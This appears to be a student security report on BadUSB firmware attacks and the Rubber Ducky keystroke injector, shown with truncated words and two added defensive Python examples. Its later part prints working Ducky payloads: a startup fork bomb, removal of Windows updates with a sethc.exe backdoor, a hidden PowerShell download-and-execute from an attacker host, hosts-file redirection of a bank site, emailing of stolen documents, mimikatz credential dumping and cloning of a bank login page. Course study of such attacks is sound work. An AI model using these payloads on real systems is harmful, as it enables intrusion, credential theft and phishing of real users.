USB Injectable Script Hacking


  • 7/21/2019 USB Injectable Script Hacking


    Shawn Seaman

    Professor Hayajneh

    Network Security and Perimeter Protection

    Bad USB: Abusing the Inherent Trust of IO Devices

    USB has become such a standard interface in the IT world because of its sheer versatility. There is a multitude of devices that connect through the USB interface, making it a “1 interface for many” type of technology. If so many different hardware implementations can connect through the USB standard, what types of security mechanisms are offered and what is the process of discerning the type of hardware? Unfortunately, the bulk of USB devices on the market are in a sense HIDs (Human Interface Devices), or more simply put, devices that rely on direct physical interaction with human beings. In a literal sense, it would seem that there would not be many, if any, practical security methods applied to USB. Why would a workstation not trust a USB device, when it is trusted by the human? Humans trust keyboards, so therefore, computers trust keyboards. Webcams or keyboard devices being engineered on the firmware level to become Trojan horses that secretly deliver payloads was never fathomed by the IT security world, and for good reason. The physical components that make up a USB device, and the fact that companies do not lock down the firmware on the devices they produce, have led to the ability of security researchers to exploit USB. With the use of custom code injection, firmware reverse engineering, and the inherent trust OSes across all platforms (Linux, Mac, and Windows) place in USB devices, researchers have truly been able to turn good devices evil.

    What exactly is USB and BadUSB? USB stands for Universal Serial Bus; it is a standard developed in the early 1990's that created the communication protocols in a bus connection, communication and power supply between computer (or motherboard) and the other device.[1] The USB protocol simultaneously powers the device and creates mediums for data transfer, data stream, and communication. BadUSB is a new class of attack that relies on the USB interface itself. This exploit is technically separate from operating system security, though it does revel in the fact that machines trust USB by default. In a sense BadUSB takes advantage of the lack of embedded security in USB devices. The USB device, whether it is a keyboard, webcam, mouse, or even a joystick, becomes malicious

    1 (http://msdn.microsoft.com/en-us/library/windows/hardware/ff538930%28v=vs.85%29.aspx, n.d.)


    through device tampering, not OS tampering.[2] This makes BadUSB so dangerous. It dually wields the ability to be hidden in a joystick or webcam (are workstations going to scan joysticks?), and has the versatility of being OS independent. Many virus programmers only target specific OSes due to the different libraries or dependencies they contain. (Trojans coded in Java do infect all OSes.) BadUSB does not face the problem of dependencies, as for the most part, all OSes will accept, for example, keyboards. It is very important to know what BadUSB is not, before truly understanding what it indeed is. Viruses, Trojans, worms, or other malware require OS dependent libraries, DLLs, and other dependencies, not to mention antivirus and firewall evasion, but BadUSB is the opposite of this type of attack vector. BadUSB is not a piece of malware sitting on the flash storage portion of the USB device. Turning a USB “evil” relies on actually reprogramming the USB device itself at the firmware level. Deep level code injection into the firmware, through reverse engineering, can turn a simple USB microphone into a device capable of injecting keystrokes silently. What damage can keystroke injection do? The possibilities are indeed endless, and they will be demonstrated in this report by even a novice user. Silently executing commands via Windows PowerShell can cause havoc on a workstation. So it is understood that BadUSB can emulate a keyboard. Antivirus will not be able to scan this as malicious; it simply reads as a keyboard. The device can now execute possible PowerShell commands on the OS to delete files, infiltrate files, or install malware. The hosts file of a workstation can be edited, which will redirect users to specific websites of the attacker's choice. With the right social engineering attack implementation, this can cause credentials to be sniffed through the use of cloned websites. A second attack vector of BadUSB is that of spoofed network adapters. This can be a huge problem if the attacker embedded code in this example to change the computer's DNS settings to redirect traffic. Security mechanisms will overlook this attack, and Man in the Middle attacks will become easy. It would be simple to implement a rogue access point, having unknowing users connect to it, and then subjecting them to Man in the Middle attacks. They would be none the wiser considering there is no protection against detecting a USB mouse transforming into a spoofed network adapter. Another exploit BadUSB can take advantage of is the fact that many devices are plugged in and recogni


    previously. All USB devices have a controller chip. The user doesn't interact with the controller chip. An example of this would be if the user is interacting with a flash drive for file storage, they are only interacting with the mass storage portion of the device. The same flash drive stores a firmware which is executed by the controller chip. Again the user does not interact with the firmware, only the fact that the USB is deemed “a mass storage device.” Unfortunately, this goes for the OS as well.

    So if the workstation only sees what the USB wants it to see, but not the underworking at the firmware level, it can be assumed that there are some security flaws that could be spawned from this design. It should be understood then the mechanics behind how USB devices identify themselves to workstations. The host controller inside the workstation will recogni


    more clairvoyant. We are assuming here that the attacker has already reverse engineered the firmware and has begun to inject code into the empty spaces in said firmware.

    An attacker can modify the interface to show: 1-webcam 14-video. This is telling the host controller of a workstation that a flash storage device has audio and video capability, and to be treated as such by loading said drivers. Endpoints are data ports responsible for streams of information through the bus. Think of endpoints like TCP streams. The endpoints portion of the USB will always have a control portion identified 0. Here the attacker modified the endpoints to no longer be the data transfer protocol that was suitable for the flash storage device, but instead has told the workstation to accommodate for video transfer streams and audio transfer streams. This storage device is being completely read as a webcam at this point. This has the makings of an evil firmware that accesses the audio and video captures of a workstation and uses them for insidious reconnaissance. Upon looking at the serial number modification, a few important things can be noted. The serial numbers are not even the same length. USB does not have a fixed serial number or any type of constant method behind USB serial numbers. They are completely randomi
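The interface and endpoint fields described above can be read back from a raw configuration descriptor and compared with what the product is sold as. The following Python sketch is an added example, not code from the original report; the descriptor bytes are constructed samples, and `parse_config`, `audit` and the `sold_as` set are names assumed for illustration.

```python
# Added example: audit interface classes in a raw USB configuration descriptor.
CLASS_NAMES = {
    0x01: "audio", 0x02: "cdc-control", 0x03: "hid", 0x08: "mass-storage",
    0x0A: "cdc-data", 0x0E: "video", 0xE0: "wireless-controller",
}
DT_INTERFACE, DT_ENDPOINT = 0x04, 0x05
TRANSFER_TYPES = ("control", "isochronous", "bulk", "interrupt")


def parse_config(blob):
    """Walk the length/type-prefixed descriptors and return the interfaces found."""
    interfaces, pos = [], 0
    while pos < len(blob):
        if len(blob) - pos < 2 or blob[pos] < 2 or pos + blob[pos] > len(blob):
            raise ValueError(f"malformed descriptor at offset {pos}")
        length, dtype = blob[pos], blob[pos + 1]
        d = blob[pos:pos + length]
        if dtype == DT_INTERFACE and length >= 9:
            interfaces.append({"number": d[2], "class": d[5], "subclass": d[6],
                               "protocol": d[7], "endpoints": []})
        elif dtype == DT_ENDPOINT and length >= 7 and interfaces:
            interfaces[-1]["endpoints"].append({
                "address": d[2] & 0x0F,
                "direction": "in" if d[2] & 0x80 else "out",
                "transfer": TRANSFER_TYPES[d[3] & 0x03],
            })
        pos += length
    return interfaces


def audit(blob, sold_as):
    """Return one finding per interface whose class is outside `sold_as`."""
    findings = []
    for itf in parse_config(blob):
        name = CLASS_NAMES.get(itf["class"], f"class-0x{itf['class']:02x}")
        if name in sold_as:
            continue
        note = f"interface {itf['number']}: unexpected {name}"
        # HID class 3, boot subclass 1, protocol 1 is a keyboard.
        if (itf["class"], itf["subclass"], itf["protocol"]) == (0x03, 0x01, 0x01):
            note += " (boot keyboard: can type on the host)"
        findings.append(note)
    return findings


def config_header(total_length, num_interfaces):
    """Constructed 9-byte configuration descriptor header."""
    return bytes([9, 2, total_length, 0, num_interfaces, 1, 0, 0x80, 50])


# Constructed sample: bulk-only mass storage interface with two bulk endpoints.
STORAGE_IF = bytes([9, 4, 0, 0, 2, 0x08, 0x06, 0x50, 0,
                    7, 5, 0x81, 0x02, 0x00, 0x02, 0,
                    7, 5, 0x02, 0x02, 0x00, 0x02, 0])
CLEAN_STICK = config_header(32, 1) + STORAGE_IF
# Constructed sample: same stick also announcing video and a HID keyboard.
TAMPERED_STICK = (config_header(66, 3) + STORAGE_IF
                  + bytes([9, 4, 1, 0, 0, 0x0E, 0x01, 0x00, 0])
                  + bytes([9, 4, 2, 0, 1, 0x03, 0x01, 0x01, 0,
                           9, 0x21, 0x11, 0x01, 0, 1, 0x22, 0x3F, 0,
                           7, 5, 0x83, 0x03, 0x08, 0x00, 0x0A]))

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN_STICK), ("tampered", TAMPERED_STICK)):
        print(label, audit(blob, {"mass-storage"}))
```

Descriptors are self-reported by the firmware, so this check only catches a device that announces extra interfaces at enumeration time; it cannot see what the firmware does later.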


    This gave them complete access to the USB firmware to make the USB devices perform and appear as any type of USB device. The first step was to find leaked firmware on the net. In order to reverse engineer the USB chip from the specific 2 companies they targeted, they needed the necessary code. They then applied heuristics to the code. They counted matches with start and call instructions for different memory locations. This allowed them to find the descriptors in the binary code. Once they essentially had the firmware mapped out, they installed their own hooks and injected their own code in unused parts of the firmware. (This could be performed on webcams, keyboards etc., but they focused on a flash storage device.) This type of reverse engineering they applied to only two chips. But nothing is stopping malicious users with resources from reverse engineering many chips from many companies.

    Nohl and Lell ran multiple demo attacks. They ran the attacks on a Linux system. The first attack revolved around gaining admin credentials and escalating privileges. Linux requires malware to run with root privileges to infect other USB devices or become a network adapter that changes DNS settings. They needed to escalate privileges to get root access. How was this done? They got the sudo password on the machine. The USB executed kb commands to activate and restart the screensaver. The user at this point re-entered the password to get off the screensaver, and then the malware stole the sudo (admin) password by malware injected in a binary related to the screensaver libraries. Now further damage can be done to the system as Nohl and Lell now had complete root access. This all relied on keyboard injection and code injected into screensaver dependencies, and none of the malicious activity took place on the storage portion that interacts with the OS. This completely evades antivirus. The second attack had the USB stick spoofed as a network adapter. They successfully got the USB storage device to act as a DHCP server and assign an IP, but not assign a default gateway. This tells the workstation to use the DNS server but doesn't tell it how to reach it. This is a form of DNS poisoning. A real world implementation of this attack would be when a victim browses to https://chase.com, but goes to the attacker's version of a cloned chase.com and enters their credentials through the spoofed site. Virus scanners won't pick up on this. They also proposed a theoretical virtual machine breakout attack: a USB device programmed to spawn into two USB devices, where the second device connects to the host computer, then begins injection to pillage the system. This could be trouble for backed up cloud servers on virtual machines. Nohl and Lell also performed attacks using an Android phone. They simply plugged the phone into a workstation to charge the phone. Not only did the phone charge, but they performed the DNS attack as well.

    It has been discussed in great detail what BadUSB can do, but what security mechanisms can be taken to avert the exploit? Are software rollbacks a viable solution? Consider this scenario. The system admin decides to reinstall operating systems, or do rollbacks/system restores to clean up the attack. They need to recover from the virus, and will most likely lose time and money during the effort. The problem is that this is not patchable via software. If the keyboard has infected firmware, the system admin would have to reali


    serial number. Perhaps a firewall solution does have this feature. It would not matter. Serial numbers are not mandatory as mentioned before, and can be spoofed. If the user allows a keyboard from Logitech for example, with a certain serial number, and the firewall whitelists it... the BadUSB exploit can detect this and spoof this serial. Antivirus meets a similar fate of ineffectiveness as its predecessors. They are especially ineffective if the USB device is plugged in at boot time and a rootkit is installed via boot sector, as already discussed. What if the device is plugged in during login and is scanned immediately? The scanner wants to read contents of the device but this is done with the permission and assistance of the firmware. If the firmware is programmed to lock itself down from being read, the scanner is useless. Possible fixes only exist in the realm of the hardware manufacturers at this time. Manufacturers need to implement a locked firmware. The problem with this is now there can be no feasible way to have firmware updates. It is absolutely unpractical to lock down the firmware. It is possible to use cryptographic signatures for firmware but this is hard and expensive to implement on USB microcontroller chips. It is so costly that this implementation would most certainly never become mainstream and evolve into a USB standard of security. Examination of the IronKey USB storage device, and its hefty price tag of over 100 dollars for 16 gb of data storage, provides the assurance of cryptographic signing not becoming a standard. IronKey offers military grade encrypted USB products, as well as physical protection. They assure that their USB storage devices are not susceptible to BadUSB attacks. This is one example of a company using code signing encryption methods to authenticate firmware updates. If the firmware cannot be authenticated it cannot be used. It basically self-destructs. This is expensive, timely and hard to do with a USB controller chip, and therefore in all likelihood won't spread to the masses as a USB standard.

    It is obvious and common sense that to have any effect and compromise security, the attacker needs at one point or another, whether by his own hands or the victim, physical access to a machine. What methods can be used to infect users with BadUSB? The art of social engineering sticks out as the most effective way to utili


    that he would actually sprinkle malicious USB drives in company parking lots, just assuming employees would pick them up and use them. Everyone likes a free storage device. It can be important to take advantage of physical security if networking security is up to par. If an attacker cannot get through the network, it is possible if they had the will, to infiltrate companies physically, and drop USB devices on sysadmin desks, or perform the attacks themselves at an unmanned workstation. If imagination permits, an adversary with huge amounts of resources packages BadUSB infected keyboards with workstations meant to be shipped to a government location. They gain access to the workstations before shipment, and swap out the keyboards for the same one, just with a modified firmware. Anything is possible when it comes to BadUSB attacks, and that is mostly due to how relied they are on as HIDs.

    The USB Rubber Ducky exemplifies how any USB device can become an 0) The Rubber Ducky, by the company Hak5, has the motto, “IF IT QUACKS LIKE A KEYBOARD, AND TYPES LIKE A KEYBOARD, IT MUST BE A KEYBOARD.” The Rubber Ducky is a 40 dollar USB device that is used by penetration testers or malicious attackers. It acts as a keyboard; more specifically, it's a keyboard injection tool with its own scripting language that the attacker can customi


    vital to go over the Ducky syntax and commands. The command REM is analogous to that of a comment command. Any code that begins on a line with REM will not be executed. It should be known that each command happens on a separate line in a synchroni


    most simple program. This is to understand the process before the programs get more complex.

    The duckencode.jar is navigated to via command prompt. Execute java -jar duckencode.jar -i easypayload.txt -o inject.bin. This takes the Duckyscript in the text file and outputs it to an injectable jar file. After copying the payload to the SD card and loading it to the Ducky, the script was executed.

    DELAY 3000
    GUI r
    DELAY 1000
    STRING winword.exe
    ENTER
    DELAY 2000
    ENTER
    STRING MY NAME IS SHAWN SEAMAN, THIS IS THE MOST BASIC IMPLEMENTATION OF THE INJECTABLE USB DEVICE'S CAPABILITY
    STRING ENTER
    STRING TO INJECT KEYSTROKES ON A MACHINE. HELLO WORLD!
    DELAY 3000
    GUI r
    DELAY 200
    STRING notepad
    ENTER
    DELAY 200
    STRING Hello World!!!


    ENTER

    This simple script opened up Microsoft Word on the workstation and executed the string specified. The second script was a fork bomb batch script, that initiali Fork bombs are denial of service attacks that continually call on themselves in the code, in order to constantly replicate till there are no resources left on the PC. Only relevant code will be shown from now on. Full codes will be uploaded separately.

    STRING cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
    ENTER
    STRING copy con a.bat
    ENTER
    STRING @echo off
    ENTER
    STRING :START
    [5]

    This next script will delete Windows Updates. This script was especially useful for making a patched Windows machine vulnerable to exploits.

    W
    ENTER
    STRING $input = "KB284518"
    ENTER
    STRING $input = $input.Replace("KB", "")
    ENTER
    STRING $cmdString = "wusa /quiet /norestart /uninstall /kb:" + $input
    ENTER
    STRING Invoke-Expression -Command $cmdString
    ENTER
    STRING REG ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe” + + “ /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe
    ENTER
    [6]

    The line “STRING $input = "KB284518"” is especially important as that line is where you insert the update you want removed. Multiple payloads can be put onto the SD card, which means multiple updates can be uninstalled. After this script was run on the target computer, Armitage

    5 https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---fork-bomb

    6 http://www.ducktoolkit.com/ScriptSelection.jsp


    was used to scan for, and execute a payload on, the target host. A reverse shell was initiated and the machine was exploited.

    The next attack is called “DuckSlurp” and it acts as a keyboard injector as well as a simultaneous storage device. The point of this attack is to quickly and silently copy the entire contents of “My Documents,” to the Ducky. It utili

    rom "shawnportscan@gmail.com"
    ENTER
    STRING $ReportEmail.To.Add("shawnportscan@gmail.com")
    ENTER
    STRING $ReportEmail.Subject = "Duck Toolkit Recon Report"
    ENTER

    7 https://forums.hak5.org/index.php?/topic/30179-payload-duck-slurp-v2-silent/


    STRING $ReportEmail.Body = "Please find attached your reconnaissance report."
    ENTER
    STRING $ReportEmail.Attachments.

    In this script portscanbyshawn@gmail.com and password1234 were used for demo purposes, but these can be customi


    GUI r
    DELAY 100
    STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile("http://shawnspayload/bob.old","%TEMP%\bob.exe");Start-Process %TEMP%\bob.exe
    ENTER

    The simple added string “windowstyle hidden,” will keep the PowerShell invisible during this entire execution. PowerShell will use the wget command to pull the content from “shawnspayload” and the target will be exploited.

    The attacker can also edit the hosts file for good measure if they wish. In this example, we can set www.chase.com to redirect to a malicious version that will pull the credentials.

    CTRL-SHIFT ENTER
    DELAY 400
    STRING cd C:\Windows\System32\drivers\etc\
    ENTER
    DELAY 400
    STRING echo 64.149.122.94 www.chase.com>>hosts

    Chase will be the site the victim will attempt to go to, whereas the IP is the site the victim will be redirected to.

    This next Rubber Ducky attack utili


    STRING sekurlsa::logonPasswords full
    ENTER

    The Ducky, as shown already, can edit the hosts file, but what if the attacker did a more advanced DNS poisoning, and also used a penetration testing tool to further the blow. The below snippet of code is the meat and potatoes of this DNS poisoning attack.[14]

    redirectionAddress = "10.255.169.6 "
    ENTER
    STRING $redirectedSite = "www.chase.com/login"
    ENTER
    STRING $hosts = $redirectionAddress + " " + $redirectedSite
    ENTER
    STRING $hosts2 = $redirectionAddress + " www." + $redirectedSite
    ENTER
    STRING Add-Content -Value $hosts -Path "C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS"
    ENTER
    STRING Add-Content -Value $hosts2 -Path "C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS"

    The attacker should modify “$redirectedSite” to the site the victim assumes to be visiting. Then the attacker should modify the “$redirectedSite” to the IP they are running the cloned version of the website on. Common examples would be social media sites such as Twitter and Facebook, or financial institutions such as Chase or TDBank. The attacker can now send a spoofed email to the victim, telling them they need to re-enter their credentials at chase.com. Suspicion will be avoided as the attacker can type the actual chase URL into the email. Using Kali Linux tool SET, the attacker will be broadcasting this cloned chase site on the network.

    14 https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---local-dns-poisoning


    Choose option 1: Social Engineering Attacks.


    Then select option 2. The attacker wants to exploit the victim's browser. Then select option for Credential Harvester Attack.


    Now the attacker will choose to clone chase.com.


    In the screenshot above www.chase.com was entered, and cloned. The IP address 10.255.169.6 will be the attacker's LHOST or external host IP. The only step left is to start the Apache server. Once the victim attempts to go to www.chase.com, they will be redirected to a cloned Chase website at 10.255.169.6, and the credentials logged.
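Both hosts-file payloads described above leave a visible artifact on disk, so a defender can audit the file directly. The following Python check is an added example, not part of the original report; the watched-domain list, the approved-entry set and the sample file contents (documentation-range addresses) are assumptions made for illustration.

```python
# Added example: flag hosts-file entries that redirect or shadow watched domains.
import ipaddress

WATCHED_DOMAINS = {"chase.com"}                       # assumption: chosen by the defender
APPROVED = {("10.0.0.5", "intranet.corp.example")}    # assumption: known-good static entries

# Constructed sample; the last watched entry mirrors the "www." + site/login
# concatenation used by the second payload in the text.
SAMPLE_HOSTS = """\
# constructed sample hosts file
127.0.0.1 localhost
::1 localhost
10.0.0.5 intranet.corp.example
192.0.2.10 www.chase.com
192.0.2.10 www.www.chase.com/login
0.0.0.0 telemetry.example.net
198.51.100.7 update.example.org   # unexplained static mapping
"""


def parse_hosts(text):
    """Yield (line number, ip, hostname) for every mapping in hosts-file text."""
    for lineno, raw in enumerate(text.splitlines(), start=1):
        fields = raw.split("#", 1)[0].split()   # drop comments, split on whitespace
        if len(fields) < 2:
            continue
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                            # not a mapping line
        for name in fields[1:]:
            # A URL path is meaningless in a hosts file; keep only the host part.
            host = name.lower().split("/", 1)[0].rstrip(".")
            if host:
                yield lineno, ip, host


def audit_hosts(text, watched=WATCHED_DOMAINS, approved=APPROVED):
    """Return findings: 'redirect', 'blackhole' or 'unapproved' entries."""
    findings = []
    for lineno, ip, host in parse_hosts(text):
        local = ip.is_loopback or ip.is_unspecified
        if any(host == d or host.endswith("." + d) for d in watched):
            kind = "blackhole" if local else "redirect"
        elif not local and (str(ip), host) not in approved:
            kind = "unapproved"
        else:
            continue
        findings.append({"line": lineno, "host": host, "ip": str(ip), "kind": kind})
    return findings


if __name__ == "__main__":
    for finding in audit_hosts(SAMPLE_HOSTS):
        print(finding)
```

Any `redirect` finding for a watched domain warrants treating the workstation as compromised, since the entry can only have been written with administrative rights.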

    The final attack was performed on a Samsung Galaxy S4, running a fully updated version of Android. The point of this attack was to brute force a 4 digit pin. These will be all combinations from 0000 to 9999. That is nine thousand nine hundred and ninety nine possible pin combinations. Even Android and iPhones will read USB devices as keyboards. The Rubber Ducky thankfully came with an adapter. The male side of the Ducky plugs directly into a


    type-a female connector, and that is converted on the end to a micro-USB male connector. This plugs directly into the charging port of the Samsung Galaxy S4. It should be noted that after five failed pin attempts on an Android, the Android device will lock for 30 seconds. Analy


    When testing on the Android the pin was set to 0009, for time saving sake, and it did work flawlessly.

    Whether utili


    7. https://forums.hak5.org/index.php?/topic/30179-payload-duck-slurp-v2-silent/

    8. https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---netcat-FTP-download-and-reverse-shell

    9. https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---powershell-wget---execute

    10. http://blog.opensecurityresearch.com/2012/06/using-mimikat